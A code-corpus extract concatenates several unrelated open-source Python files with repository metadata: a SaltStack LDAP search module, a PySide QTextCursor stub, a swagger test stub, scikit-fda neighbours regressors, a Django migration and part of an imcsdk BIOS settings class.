ldap.anonymous: True (default=True, bind anonymous)
ldap.scope: 2 (default=2, ldap.SCOPE_SUBTREE)
ldap.attrs: [saltAttr] (default=None, return all attributes)
.. warning::
At the moment this module only recommends connection to LDAP services
listening on ``localhost``. This is deliberate to avoid the potentially
dangerous situation of multiple minions sending identical update commands
to the same LDAP server. It's easy enough to override this behavior, but
badness may ensue - you have been warned.
"""
import logging
import time
import salt.utils.data
from salt.exceptions import CommandExecutionError
try:
import ldap
import ldap.modlist # pylint: disable=no-name-in-module
HAS_LDAP = True
except ImportError:
HAS_LDAP = False
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = "ldap"
def __virtual__():
"""
Only load this module if the ldap config is set
"""
# These config items must be set in the minion config
if HAS_LDAP:
return __virtualname__
return (
False,
"The ldapmod execution module cannot be loaded: ldap config not present.",
)
def _config(name, key=None, **kwargs):
"""
Return a value for 'name' from command line args then config file options.
Specify 'key' if the config file option is not the same as 'name'.
"""
if key is None:
key = name
if name in kwargs:
value = kwargs[name]
else:
value = __salt__["config.option"]("ldap.{}".format(key))
return salt.utils.data.decode(value, to_str=True)
def _connect(**kwargs):
"""
Instantiate LDAP Connection class and return an LDAP connection object
"""
connargs = {}
for name in [
"uri",
"server",
"port",
"tls",
"no_verify",
"binddn",
"bindpw",
"anonymous",
]:
connargs[name] = _config(name, **kwargs)
return _LDAPConnection(**connargs).ldap
def search(
filter, # pylint: disable=C0103
dn=None, # pylint: disable=C0103
scope=None,
attrs=None,
**kwargs
):
"""
Run an arbitrary LDAP query and return the results.
CLI Example:
.. code-block:: bash
salt 'ldaphost' ldap.search "filter=cn=myhost"
Return data:
.. code-block:: python
{'myhost': {'count': 1,
'results': [['cn=myhost,ou=hosts,o=acme,c=gb',
{'saltKeyValue': ['ntpserver=ntp.acme.local',
'foo=myfoo'],
'saltState': ['foo', 'bar']}]],
'time': {'human': '1.2ms', 'raw': '0.00123'}}}
Search and connection options can be overridden by specifying the relevant
option as key=value pairs, for example:
.. code-block:: bash
salt 'ldaphost' ldap.search filter=cn=myhost dn=ou=hosts,o=acme,c=gb
scope=1 attrs='' server='localhost' port='7393' tls=True bindpw='ssh'
"""
if not dn:
dn = _config("dn", "basedn") # pylint: disable=C0103
if not scope:
scope = _config("scope")
if attrs == "": # Allow command line 'return all' attr override
attrs = None
elif attrs is None:
attrs = _config("attrs")
_ldap = _connect(**kwargs)
start = time.time()
log.debug(
"Running LDAP search with filter:%s, dn:%s, scope:%s, attrs:%s",
filter,
dn,
scope,
attrs,
)
results = _ldap.search_s(dn, int(scope), filter, attrs)
elapsed = time.time() - start
if elapsed < 0.200:
elapsed_h = str(round(elapsed * 1000, 1)) + "ms"
else:
elapsed_h = str(round(elapsed, 2)) + "s"
ret = {
"results": results,
"count": len(results),
"time": {"human": elapsed_h, "raw": str(round(elapsed, 5))},
}
return ret
class _LDAPConnection:
"""
Setup an LDAP connection.
"""
def __init__(self, uri, server, port, tls, no_verify, binddn, bindpw, anonymous):
"""
Bind to an LDAP directory using passed credentials.
"""
self.uri = uri
self.server = server
self.port = port
self.tls = tls
self.binddn = binddn
self.bindpw = bindpw
if self.uri == "":
self.uri = "ldap://{}:{}".format(self.server, self.port)
try:
if no_verify:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER)
self.ldap = ldap.initialize("{}".format(self.uri))
self.ldap.protocol_version = 3 # ldap.VERSION3
self.ldap.set_option(ldap.OPT_REFERRALS, 0) # Needed for AD
if self.tls:
self.ldap.start_tls_s()
if not anonymous:
self.ldap.simple_bind_s(self.binddn, self.bindpw)
except Exception as ldap_error: # pylint: disable=broad-except
raise CommandExecutionError(
"Failed to bind to LDAP server {} as {}: {}".format(
self.uri, self.binddn, ldap_error
)
)
| 28.12093
| 85
| 0.592954
|
3ae7c4a22cffa35f7b1e2ff28be360b161d229ea
| 8,645
|
py
|
Python
|
resources/dot_PyCharm/system/python_stubs/-762174762/PySide/QtGui/QTextCursor.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | 1
|
2020-04-20T02:27:20.000Z
|
2020-04-20T02:27:20.000Z
|
resources/dot_PyCharm/system/python_stubs/cache/8cdc475d469a13122bc4bc6c3ac1c215d93d5f120f5cc1ef33a8f3088ee54d8e/PySide/QtGui/QTextCursor.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | null | null | null |
resources/dot_PyCharm/system/python_stubs/cache/8cdc475d469a13122bc4bc6c3ac1c215d93d5f120f5cc1ef33a8f3088ee54d8e/PySide/QtGui/QTextCursor.py
|
basepipe/developer_onboarding
|
05b6a776f8974c89517868131b201f11c6c2a5ad
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# module PySide.QtGui
# from C:\Python27\lib\site-packages\PySide\QtGui.pyd
# by generator 1.147
# no doc
# imports
import PySide.QtCore as __PySide_QtCore
import Shiboken as __Shiboken
class QTextCursor(__Shiboken.Object):
# no doc
def anchor(self, *args, **kwargs): # real signature unknown
pass
def atBlockEnd(self, *args, **kwargs): # real signature unknown
pass
def atBlockStart(self, *args, **kwargs): # real signature unknown
pass
def atEnd(self, *args, **kwargs): # real signature unknown
pass
def atStart(self, *args, **kwargs): # real signature unknown
pass
def beginEditBlock(self, *args, **kwargs): # real signature unknown
pass
def block(self, *args, **kwargs): # real signature unknown
pass
def blockCharFormat(self, *args, **kwargs): # real signature unknown
pass
def blockFormat(self, *args, **kwargs): # real signature unknown
pass
def blockNumber(self, *args, **kwargs): # real signature unknown
pass
def charFormat(self, *args, **kwargs): # real signature unknown
pass
def clearSelection(self, *args, **kwargs): # real signature unknown
pass
def columnNumber(self, *args, **kwargs): # real signature unknown
pass
def createList(self, *args, **kwargs): # real signature unknown
pass
def currentFrame(self, *args, **kwargs): # real signature unknown
pass
def currentList(self, *args, **kwargs): # real signature unknown
pass
def currentTable(self, *args, **kwargs): # real signature unknown
pass
def deleteChar(self, *args, **kwargs): # real signature unknown
pass
def deletePreviousChar(self, *args, **kwargs): # real signature unknown
pass
def document(self, *args, **kwargs): # real signature unknown
pass
def endEditBlock(self, *args, **kwargs): # real signature unknown
pass
def hasComplexSelection(self, *args, **kwargs): # real signature unknown
pass
def hasSelection(self, *args, **kwargs): # real signature unknown
pass
def insertBlock(self, *args, **kwargs): # real signature unknown
pass
def insertFragment(self, *args, **kwargs): # real signature unknown
pass
def insertFrame(self, *args, **kwargs): # real signature unknown
pass
def insertHtml(self, *args, **kwargs): # real signature unknown
pass
def insertImage(self, *args, **kwargs): # real signature unknown
pass
def insertList(self, *args, **kwargs): # real signature unknown
pass
def insertTable(self, *args, **kwargs): # real signature unknown
pass
def insertText(self, *args, **kwargs): # real signature unknown
pass
def isCopyOf(self, *args, **kwargs): # real signature unknown
pass
def isNull(self, *args, **kwargs): # real signature unknown
pass
def joinPreviousEditBlock(self, *args, **kwargs): # real signature unknown
pass
def keepPositionOnInsert(self, *args, **kwargs): # real signature unknown
pass
def mergeBlockCharFormat(self, *args, **kwargs): # real signature unknown
pass
def mergeBlockFormat(self, *args, **kwargs): # real signature unknown
pass
def mergeCharFormat(self, *args, **kwargs): # real signature unknown
pass
def movePosition(self, *args, **kwargs): # real signature unknown
pass
def position(self, *args, **kwargs): # real signature unknown
pass
def positionInBlock(self, *args, **kwargs): # real signature unknown
pass
def removeSelectedText(self, *args, **kwargs): # real signature unknown
pass
def select(self, *args, **kwargs): # real signature unknown
pass
def selectedTableCells(self, *args, **kwargs): # real signature unknown
pass
def selectedText(self, *args, **kwargs): # real signature unknown
pass
def selection(self, *args, **kwargs): # real signature unknown
pass
def selectionEnd(self, *args, **kwargs): # real signature unknown
pass
def selectionStart(self, *args, **kwargs): # real signature unknown
pass
def setBlockCharFormat(self, *args, **kwargs): # real signature unknown
pass
def setBlockFormat(self, *args, **kwargs): # real signature unknown
pass
def setCharFormat(self, *args, **kwargs): # real signature unknown
pass
def setKeepPositionOnInsert(self, *args, **kwargs): # real signature unknown
pass
def setPosition(self, *args, **kwargs): # real signature unknown
pass
def setVerticalMovementX(self, *args, **kwargs): # real signature unknown
pass
def setVisualNavigation(self, *args, **kwargs): # real signature unknown
pass
def verticalMovementX(self, *args, **kwargs): # real signature unknown
pass
def visualNavigation(self, *args, **kwargs): # real signature unknown
pass
def __copy__(self, *args, **kwargs): # real signature unknown
pass
def __eq__(self, y): # real signature unknown; restored from __doc__
""" x.__eq__(y) <==> x==y """
pass
def __ge__(self, y): # real signature unknown; restored from __doc__
""" x.__ge__(y) <==> x>=y """
pass
def __gt__(self, y): # real signature unknown; restored from __doc__
""" x.__gt__(y) <==> x>y """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, y): # real signature unknown; restored from __doc__
""" x.__le__(y) <==> x<=y """
pass
def __lt__(self, y): # real signature unknown; restored from __doc__
""" x.__lt__(y) <==> x<y """
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __ne__(self, y): # real signature unknown; restored from __doc__
""" x.__ne__(y) <==> x!=y """
pass
def __nonzero__(self): # real signature unknown; restored from __doc__
""" x.__nonzero__() <==> x != 0 """
pass
BlockUnderCursor = PySide.QtGui.QTextCursor.SelectionType.BlockUnderCursor
Document = PySide.QtGui.QTextCursor.SelectionType.Document
Down = PySide.QtGui.QTextCursor.MoveOperation.Down
End = PySide.QtGui.QTextCursor.MoveOperation.End
EndOfBlock = PySide.QtGui.QTextCursor.MoveOperation.EndOfBlock
EndOfLine = PySide.QtGui.QTextCursor.MoveOperation.EndOfLine
EndOfWord = PySide.QtGui.QTextCursor.MoveOperation.EndOfWord
KeepAnchor = PySide.QtGui.QTextCursor.MoveMode.KeepAnchor
Left = PySide.QtGui.QTextCursor.MoveOperation.Left
LineUnderCursor = PySide.QtGui.QTextCursor.SelectionType.LineUnderCursor
MoveAnchor = PySide.QtGui.QTextCursor.MoveMode.MoveAnchor
MoveMode = None # (!) real value is "<type 'PySide.QtGui.QTextCursor.MoveMode'>"
MoveOperation = None # (!) real value is "<type 'PySide.QtGui.QTextCursor.MoveOperation'>"
NextBlock = PySide.QtGui.QTextCursor.MoveOperation.NextBlock
NextCell = PySide.QtGui.QTextCursor.MoveOperation.NextCell
NextCharacter = PySide.QtGui.QTextCursor.MoveOperation.NextCharacter
NextRow = PySide.QtGui.QTextCursor.MoveOperation.NextRow
NextWord = PySide.QtGui.QTextCursor.MoveOperation.NextWord
NoMove = PySide.QtGui.QTextCursor.MoveOperation.NoMove
PreviousBlock = PySide.QtGui.QTextCursor.MoveOperation.PreviousBlock
PreviousCell = PySide.QtGui.QTextCursor.MoveOperation.PreviousCell
PreviousCharacter = PySide.QtGui.QTextCursor.MoveOperation.PreviousCharacter
PreviousRow = PySide.QtGui.QTextCursor.MoveOperation.PreviousRow
PreviousWord = PySide.QtGui.QTextCursor.MoveOperation.PreviousWord
Right = PySide.QtGui.QTextCursor.MoveOperation.Right
SelectionType = None # (!) real value is "<type 'PySide.QtGui.QTextCursor.SelectionType'>"
Start = PySide.QtGui.QTextCursor.MoveOperation.Start
StartOfBlock = PySide.QtGui.QTextCursor.MoveOperation.StartOfBlock
StartOfLine = PySide.QtGui.QTextCursor.MoveOperation.StartOfLine
StartOfWord = PySide.QtGui.QTextCursor.MoveOperation.StartOfWord
Up = PySide.QtGui.QTextCursor.MoveOperation.Up
WordLeft = PySide.QtGui.QTextCursor.MoveOperation.WordLeft
WordRight = PySide.QtGui.QTextCursor.MoveOperation.WordRight
WordUnderCursor = PySide.QtGui.QTextCursor.SelectionType.WordUnderCursor
| 33.25
| 94
| 0.672065
|
bcc1dd1bfcd3e8bb635db2d4093d3c6811342d4b
| 813
|
py
|
Python
|
test/test_product_price_response.py
|
kinow-io/kaemo-python-sdk
|
610fce09e3a9e631babf09195b0492959d9e4d56
|
[
"Apache-2.0"
] | 1
|
2017-05-03T12:48:22.000Z
|
2017-05-03T12:48:22.000Z
|
test/test_product_price_response.py
|
kinow-io/kaemo-python-sdk
|
610fce09e3a9e631babf09195b0492959d9e4d56
|
[
"Apache-2.0"
] | null | null | null |
test/test_product_price_response.py
|
kinow-io/kaemo-python-sdk
|
610fce09e3a9e631babf09195b0492959d9e4d56
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kinow_client
from kinow_client.rest import ApiException
from kinow_client.models.product_price_response import ProductPriceResponse
class TestProductPriceResponse(unittest.TestCase):
""" ProductPriceResponse unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testProductPriceResponse(self):
"""
Test ProductPriceResponse
"""
model = kinow_client.models.product_price_response.ProductPriceResponse()
if __name__ == '__main__':
unittest.main()
| 18.906977
| 81
| 0.708487
|
7da0e431677783c3e72205012b743d8b82287911
| 13,599
|
py
|
Python
|
skfda/ml/regression/_neighbors_regression.py
|
jiduque/scikit-fda
|
5ea71e78854801b259aa3a01eb6b154aa63bf54b
|
[
"BSD-3-Clause"
] | 147
|
2019-05-10T20:46:42.000Z
|
2022-03-25T17:23:19.000Z
|
skfda/ml/regression/_neighbors_regression.py
|
jiduque/scikit-fda
|
5ea71e78854801b259aa3a01eb6b154aa63bf54b
|
[
"BSD-3-Clause"
] | 306
|
2019-04-26T08:56:05.000Z
|
2022-03-30T11:12:48.000Z
|
skfda/ml/regression/_neighbors_regression.py
|
jiduque/scikit-fda
|
5ea71e78854801b259aa3a01eb6b154aa63bf54b
|
[
"BSD-3-Clause"
] | 38
|
2019-09-03T17:24:04.000Z
|
2022-01-06T05:09:18.000Z
|
"""Neighbor models for regression."""
from sklearn.neighbors import (
KNeighborsRegressor as _KNeighborsRegressor,
RadiusNeighborsRegressor as _RadiusNeighborsRegressor,
)
from .._neighbors_base import (
KNeighborsMixin,
NeighborsBase,
NeighborsRegressorMixin,
RadiusNeighborsMixin,
)
class KNeighborsRegressor(NeighborsBase, NeighborsRegressorMixin,
KNeighborsMixin):
"""Regression based on k-nearest neighbors.
Regression with scalar, multivariate or functional response.
The target is predicted by local interpolation of the targets associated of
the nearest neighbors in the training set.
Parameters
----------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for :meth:`kneighbors` queries.
weights : str or callable, optional (default = 'uniform')
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
regressor : callable, optional ((default =
:func:`mean <skfda.exploratory.stats.mean>`))
Function to perform the local regression in the functional response
case. By default used the mean. Can the neighbors of a test sample,
and if weights != 'uniform' an array of weights as second parameter.
algorithm : {'auto', 'ball_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`sklearn.neighbors.BallTree`.
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm based on
the values passed to :meth:`fit` method.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree or KDTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
metric : string or callable, (default
:func:`l2_distance <skfda.misc.metrics.l2_distance>`)
the distance metric to use for the tree. The default metric is
the L2 distance. See the documentation of the metrics module
for a list of available metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
n_jobs : int or None, optional (default=None)
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors.
Doesn't affect :meth:`fit` method.
multivariate_metric : boolean, optional (default = False)
Indicates if the metric used is a sklearn distance between vectors (see
:class:`sklearn.neighbors.DistanceMetric`) or a functional metric of
the module :mod:`skfda.misc.metrics`.
Examples
--------
Firstly, we will create a toy dataset with gaussian-like samples shifted.
>>> from skfda.ml.regression import KNeighborsRegressor
>>> from skfda.datasets import make_multimodal_samples
>>> from skfda.datasets import make_multimodal_landmarks
>>> y = make_multimodal_landmarks(n_samples=30, std=.5, random_state=0)
>>> y_train = y.flatten()
>>> X_train = make_multimodal_samples(n_samples=30, std=.5, random_state=0)
>>> X_test = make_multimodal_samples(n_samples=5, std=.05, random_state=0)
We will fit a K-Nearest Neighbors regressor to regress a scalar response.
>>> neigh = KNeighborsRegressor()
>>> neigh.fit(X_train, y_train)
KNeighborsRegressor(...)
We can predict the modes of new samples
>>> neigh.predict(X_test).round(2) # Predict test data
array([ 0.38, 0.14, 0.27, 0.52, 0.38])
Now we will create a functional response to train the model
>>> y_train = 5 * X_train + 1
>>> y_train
FDataGrid(...)
We train the estimator with the functional response
>>> neigh.fit(X_train, y_train)
KNeighborsRegressor(...)
And predict the responses as in the first case.
>>> neigh.predict(X_test)
FDataGrid(...)
See also
--------
:class:`~skfda.ml.classification.KNeighborsClassifier`
:class:`~skfda.ml.classification.RadiusNeighborsClassifier`
:class:`~skfda.ml.classification.NearestCentroids`
:class:`~skfda.ml.regression.RadiusNeighborsRegressor`
:class:`~skfda.ml.clustering.NearestNeighbors`
Notes
-----
See Nearest Neighbors in the sklearn online documentation for a discussion
of the choice of ``algorithm`` and ``leaf_size``.
This class wraps the sklearn regressor
`sklearn.neighbors.KNeighborsRegressor`.
.. warning::
Regarding the Nearest Neighbors algorithms, if it is found that two
neighbors, neighbor `k+1` and `k`, have identical distances
but different labels, the results will depend on the ordering of the
training data.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, n_neighbors=5, weights='uniform', regressor='mean',
algorithm='auto', leaf_size=30, metric='l2',
metric_params=None, n_jobs=1, multivariate_metric=False):
"""Initialize the regressor."""
super().__init__(n_neighbors=n_neighbors,
weights=weights, algorithm=algorithm,
leaf_size=leaf_size, metric=metric,
metric_params=metric_params, n_jobs=n_jobs,
multivariate_metric=multivariate_metric)
self.regressor = regressor
def _init_multivariate_estimator(self, sklearn_metric):
"""Initialize the sklearn K neighbors estimator.
Args:
sklearn_metric: (pyfunc or 'precomputed'): Metric compatible with
sklearn API or matrix (n_samples, n_samples) with precomputed
distances.
Returns:
Sklearn K Neighbors estimator initialized.
"""
return _KNeighborsRegressor(
n_neighbors=self.n_neighbors, weights=self.weights,
algorithm=self.algorithm, leaf_size=self.leaf_size,
metric=sklearn_metric, metric_params=self.metric_params,
n_jobs=self.n_jobs)
def _query(self, X):
"""Return distances and neighbors of given sample."""
return self.estimator_.kneighbors(X)
class RadiusNeighborsRegressor(NeighborsBase, NeighborsRegressorMixin,
RadiusNeighborsMixin):
"""Regression based on neighbors within a fixed radius.
Regression with scalar, multivariate or functional response.
The target is predicted by local interpolation of the targets associated of
the nearest neighbors in the training set.
Parameters
----------
radius : float, optional (default = 1.0)
Range of parameter space to use by default for :meth:`radius_neighbors`
queries.
weights : str or callable
weight function used in prediction. Possible values:
- 'uniform' : uniform weights. All points in each neighborhood
are weighted equally.
- 'distance' : weight points by the inverse of their distance.
in this case, closer neighbors of a query point will have a
greater influence than neighbors which are further away.
- [callable] : a user-defined function which accepts an
array of distances, and returns an array of the same shape
containing the weights.
Uniform weights are used by default.
regressor : callable, optional ((default =
:func:`mean <skfda.exploratory.stats.mean>`))
Function to perform the local regression in the functional response
case. By default used the mean. Can the neighbors of a test sample,
and if weights != 'uniform' an array of weights as second parameter.
algorithm : {'auto', 'ball_tree', 'brute'}, optional
Algorithm used to compute the nearest neighbors:
- 'ball_tree' will use :class:`sklearn.neighbors.BallTree`.
- 'brute' will use a brute-force search.
- 'auto' will attempt to decide the most appropriate algorithm
based on the values passed to :meth:`fit` method.
leaf_size : int, optional (default = 30)
Leaf size passed to BallTree. This can affect the
speed of the construction and query, as well as the memory
required to store the tree. The optimal value depends on the
nature of the problem.
metric : string or callable, (default
:func:`l2_distance <skfda.metrics.l2_distance>`)
the distance metric to use for the tree. The default metric is
the L2 distance. See the documentation of the metrics module
for a list of available metrics.
metric_params : dict, optional (default = None)
Additional keyword arguments for the metric function.
outlier_response : :class:`FData`, optional (default = None)
Default response in the functional response case for test samples
without neighbors.
n_jobs : int or None, optional (default=None)
The number of parallel jobs to run for neighbors search.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors.
multivariate_metric : boolean, optional (default = False)
Indicates if the metric used is a sklearn distance between vectors (see
:class:`sklearn.neighbors.DistanceMetric`) or a functional metric of
the module :mod:`skfda.misc.metrics`.
Examples
--------
Firstly, we will create a toy dataset with gaussian-like samples shifted.
>>> from skfda.ml.regression import RadiusNeighborsRegressor
>>> from skfda.datasets import make_multimodal_samples
>>> from skfda.datasets import make_multimodal_landmarks
>>> y = make_multimodal_landmarks(n_samples=30, std=.5, random_state=0)
>>> y_train = y.flatten()
>>> X_train = make_multimodal_samples(n_samples=30, std=.5, random_state=0)
>>> X_test = make_multimodal_samples(n_samples=5, std=.05, random_state=0)
We will fit a Radius-Nearest Neighbors regressor to regress a scalar
response.
>>> neigh = RadiusNeighborsRegressor(radius=0.2)
>>> neigh.fit(X_train, y_train)
RadiusNeighborsRegressor(...radius=0.2...)
We can predict the modes of new samples
>>> neigh.predict(X_test).round(2) # Predict test data
array([ 0.39, 0.07, 0.26, 0.5 , 0.46])
Now we will create a functional response to train the model
>>> y_train = 5 * X_train + 1
>>> y_train
FDataGrid(...)
We train the estimator with the functional response
>>> neigh.fit(X_train, y_train)
RadiusNeighborsRegressor(...radius=0.2...)
And predict the responses as in the first case.
>>> neigh.predict(X_test)
FDataGrid(...)
See also
--------
:class:`~skfda.ml.classification.KNeighborsClassifier`
:class:`~skfda.ml.classification.RadiusNeighborsClassifier`
:class:`~skfda.ml.classification.NearestCentroids`
:class:`~skfda.ml.regression.KNeighborsRegressor`
:class:`~skfda.ml.clustering.NearestNeighbors`
Notes
-----
See Nearest Neighbors in the sklearn online documentation for a discussion
of the choice of ``algorithm`` and ``leaf_size``.
This class wraps the sklearn classifier
`sklearn.neighbors.RadiusNeighborsClassifier`.
https://en.wikipedia.org/wiki/K-nearest_neighbor_algorithm
"""
def __init__(self, radius=1.0, weights='uniform', regressor='mean',
algorithm='auto', leaf_size=30, metric='l2',
metric_params=None, outlier_response=None, n_jobs=1,
multivariate_metric=False):
"""Initialize the classifier."""
super().__init__(radius=radius, weights=weights, algorithm=algorithm,
leaf_size=leaf_size, metric=metric,
metric_params=metric_params, n_jobs=n_jobs,
multivariate_metric=multivariate_metric)
self.regressor = regressor
self.outlier_response = outlier_response
def _init_multivariate_estimator(self, sklearn_metric):
"""Initialize the sklearn radius neighbors estimator.
Args:
sklearn_metric: (pyfunc or 'precomputed'): Metric compatible with
sklearn API or matrix (n_samples, n_samples) with precomputed
distances.
Returns:
Sklearn Radius Neighbors estimator initialized.
"""
return _RadiusNeighborsRegressor(
radius=self.radius, weights=self.weights,
algorithm=self.algorithm, leaf_size=self.leaf_size,
metric=sklearn_metric, metric_params=self.metric_params,
n_jobs=self.n_jobs)
def _query(self, X):
"""Return distances and neighbors of given sample.
Args:
X: the sample
Returns:
Distances and neighbors of a given sample
"""
return self.estimator_.radius_neighbors(X)
| 39.64723
| 79
| 0.671005
|
c4c56eeb34bdf86315e49480f6fd7580d11e247d
| 557
|
py
|
Python
|
operator_api/ledger/migrations/0003_auto_20171229_1455.py
|
liquidity-network/nocust-hub
|
76f49f9b8a6c264fcbe9e0c110e98031d463c0a8
|
[
"MIT"
] | 1
|
2021-08-04T06:09:46.000Z
|
2021-08-04T06:09:46.000Z
|
operator_api/ledger/migrations/0003_auto_20171229_1455.py
|
liquidity-network/nocust-hub
|
76f49f9b8a6c264fcbe9e0c110e98031d463c0a8
|
[
"MIT"
] | 8
|
2020-11-01T19:48:21.000Z
|
2022-02-10T14:12:25.000Z
|
operator_api/ledger/migrations/0003_auto_20171229_1455.py
|
liquidity-network/nocust-hub
|
76f49f9b8a6c264fcbe9e0c110e98031d463c0a8
|
[
"MIT"
] | 3
|
2020-11-01T15:59:56.000Z
|
2021-09-16T07:18:18.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2017-12-29 14:55
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ledger', '0002_pgsql_constraints'),
]
operations = [
migrations.AlterField(
model_name='wallet',
name='registration_round',
field=models.BigIntegerField(
validators=[django.core.validators.MinValueValidator(0)]),
),
]
| 24.217391
| 74
| 0.639138
|
f05d7fd0f9642e16df14234b0faf65e856bb37ef
| 8,988
|
py
|
Python
|
imcsdk/mometa/bios/BiosVfUSBPortsConfig.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | null | null | null |
imcsdk/mometa/bios/BiosVfUSBPortsConfig.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | null | null | null |
imcsdk/mometa/bios/BiosVfUSBPortsConfig.py
|
vadimkuznetsov/imcsdk
|
ed038ce1dbc8031f99d2dfb3ccee3bf0b48309d8
|
[
"Apache-2.0"
] | 1
|
2019-11-10T18:42:04.000Z
|
2019-11-10T18:42:04.000Z
|
"""This module contains the general information for BiosVfUSBPortsConfig ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class BiosVfUSBPortsConfigConsts:
VP_ALL_USB_DEVICES_DISABLED = "Disabled"
VP_ALL_USB_DEVICES_ENABLED = "Enabled"
_VP_ALL_USB_DEVICES_DISABLED = "disabled"
_VP_ALL_USB_DEVICES_ENABLED = "enabled"
VP_ALL_USB_DEVICES_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_FRONT_DISABLED = "Disabled"
VP_USB_PORT_FRONT_ENABLED = "Enabled"
_VP_USB_PORT_FRONT_DISABLED = "disabled"
_VP_USB_PORT_FRONT_ENABLED = "enabled"
VP_USB_PORT_FRONT_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_INTERNAL_DISABLED = "Disabled"
VP_USB_PORT_INTERNAL_ENABLED = "Enabled"
_VP_USB_PORT_INTERNAL_DISABLED = "disabled"
_VP_USB_PORT_INTERNAL_ENABLED = "enabled"
VP_USB_PORT_INTERNAL_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_KVM_DISABLED = "Disabled"
VP_USB_PORT_KVM_ENABLED = "Enabled"
_VP_USB_PORT_KVM_DISABLED = "disabled"
_VP_USB_PORT_KVM_ENABLED = "enabled"
VP_USB_PORT_KVM_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_REAR_DISABLED = "Disabled"
VP_USB_PORT_REAR_ENABLED = "Enabled"
_VP_USB_PORT_REAR_DISABLED = "disabled"
_VP_USB_PORT_REAR_ENABLED = "enabled"
VP_USB_PORT_REAR_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_SDCARD_DISABLED = "Disabled"
VP_USB_PORT_SDCARD_ENABLED = "Enabled"
_VP_USB_PORT_SDCARD_DISABLED = "disabled"
_VP_USB_PORT_SDCARD_ENABLED = "enabled"
VP_USB_PORT_SDCARD_PLATFORM_DEFAULT = "platform-default"
VP_USB_PORT_VMEDIA_DISABLED = "Disabled"
VP_USB_PORT_VMEDIA_ENABLED = "Enabled"
_VP_USB_PORT_VMEDIA_DISABLED = "disabled"
_VP_USB_PORT_VMEDIA_ENABLED = "enabled"
VP_USB_PORT_VMEDIA_PLATFORM_DEFAULT = "platform-default"
class BiosVfUSBPortsConfig(ManagedObject):
"""This is BiosVfUSBPortsConfig class."""
consts = BiosVfUSBPortsConfigConsts()
naming_props = set([])
mo_meta = {
"classic": MoMeta("BiosVfUSBPortsConfig", "biosVfUSBPortsConfig", "USB-Ports-Config", VersionMeta.Version151f, "InputOutput", 0x7ff, [], ["admin"], [u'biosPlatformDefaults', u'biosSettings'], [], ["Get", "Set"]),
"modular": MoMeta("BiosVfUSBPortsConfig", "biosVfUSBPortsConfig", "USB-Ports-Config", VersionMeta.Version2013e, "InputOutput", 0x7ff, [], ["admin"], [u'biosPlatformDefaults', u'biosSettings'], [], ["Get", "Set"])
}
prop_meta = {
"classic": {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version151f, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x2, 0, 255, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x8, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"vp_all_usb_devices": MoPropertyMeta("vp_all_usb_devices", "vpAllUsbDevices", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
"vp_usb_port_front": MoPropertyMeta("vp_usb_port_front", "vpUsbPortFront", "string", VersionMeta.Version151f, MoPropertyMeta.READ_WRITE, 0x20, None, None, None, ["Disabled", "Enabled", "disabled", "enabled", "platform-default"], []),
